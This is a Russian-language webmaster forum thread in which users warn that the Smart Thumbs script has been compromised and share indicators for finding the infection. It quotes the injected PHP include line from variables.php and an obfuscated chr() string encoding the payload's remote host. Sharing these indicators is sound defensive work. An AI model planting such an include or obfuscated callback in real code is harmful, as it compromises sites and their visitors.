Реклама на сайте Advertise with us

Smart Thumbs - снова старая песня. Проверяем.

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

📈sflash.biz

С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447


Передовик Master-X (16.04.2018) Передовик Master-X (16.07.2018) Передовик Master-X (16.12.2022) Передовик Master-X (01.01.2023)
Ссылка на сообщениеДобавлено: 15/10/13 в 12:27       Ответить с цитатойцитата 

Для мамонтов вроде меня, кто ещё юзает Smart Thumbs, советую проверить /st/admin/variables.php на предмет разного рода несанкционированых инклудов. У меня стояли последние версии: 5.83.
Первый клик по тумбе на сайте вставляет вредоносный код. Отлавливается KIS-ом или можно увидеть в хедерах при первом клике по тумбе (смотрите вторую строку в хедерах). Все последующие клики, заходы на сайт уже ничего оне показывают, ловить надо на свежую.

4
 



С нами с 28.01.06
Сообщения: 380
Рейтинг: 588

Ссылка на сообщениеДобавлено: 15/10/13 в 14:27       Ответить с цитатойцитата 

Было бы неплохо засветить код что был в variables.php
что бы знать хоть примерно что искать

Buy ADS
More trades, Hosting Service

1
 

📈sflash.biz

С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447


Передовик Master-X (16.04.2018) Передовик Master-X (16.07.2018) Передовик Master-X (16.12.2022) Передовик Master-X (01.01.2023)
Ссылка на сообщениеДобавлено: 15/10/13 в 14:33       Ответить с цитатойцитата 

Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');

В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):
Код: [развернуть]

1
 



С нами с 28.02.12
Сообщения: 651
Рейтинг: 571

Ссылка на сообщениеДобавлено: 15/10/13 в 15:40       Ответить с цитатойцитата 

S_Flash писал:
Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');

В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):
Код: [развернуть]



и смартсж поломали?

1
 

На пенсии

С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370


Передовик Master-X (01.02.2014)
Ссылка на сообщениеДобавлено: 15/10/13 в 17:20       Ответить с цитатойцитата 

Каково действие кода? Редиректит куда траф или что-то еще?

Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS

0
 

📈sflash.biz

С нами с 03.11.12
Сообщения: 3913
Рейтинг: 4447


Передовик Master-X (16.04.2018) Передовик Master-X (16.07.2018) Передовик Master-X (16.12.2022) Передовик Master-X (01.01.2023)
Ссылка на сообщениеДобавлено: 15/10/13 в 20:10       Ответить с цитатойцитата 



Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);

0
 

@JustCallMeGuru

С нами с 22.03.09
Сообщения: 1688
Рейтинг: 1325


Передовик Master-X (16.04.2009) Передовик Master-X (01.09.2012) Передовик Master-X (16.09.2012)
Ссылка на сообщениеДобавлено: 29/10/13 в 12:04       Ответить с цитатойцитата 

Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

Дизайн, Верстка и Сайты под Ключь от AdultDesign.Guru

0
 

@JustCallMeGuru

С нами с 22.03.09
Сообщения: 1688
Рейтинг: 1325


Передовик Master-X (16.04.2009) Передовик Master-X (01.09.2012) Передовик Master-X (16.09.2012)
Ссылка на сообщениеДобавлено: 29/10/13 в 12:06       Ответить с цитатойцитата 

Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

Дизайн, Верстка и Сайты под Ключь от AdultDesign.Guru

1
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 12/11/13 в 00:22       Ответить с цитатойцитата 

S_Flash писал:
Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);


кто-нибудь изучал вопрос детальнее?

откуда ноги растут у этой дряни? уже который год.

0
 

.:GLX Group:.

С нами с 17.05.07
Сообщения: 693
Рейтинг: 752

Ссылка на сообщениеДобавлено: 12/11/13 в 09:26       Ответить с цитатойцитата 

S_Flash писал:
Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);


Код: [развернуть]

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »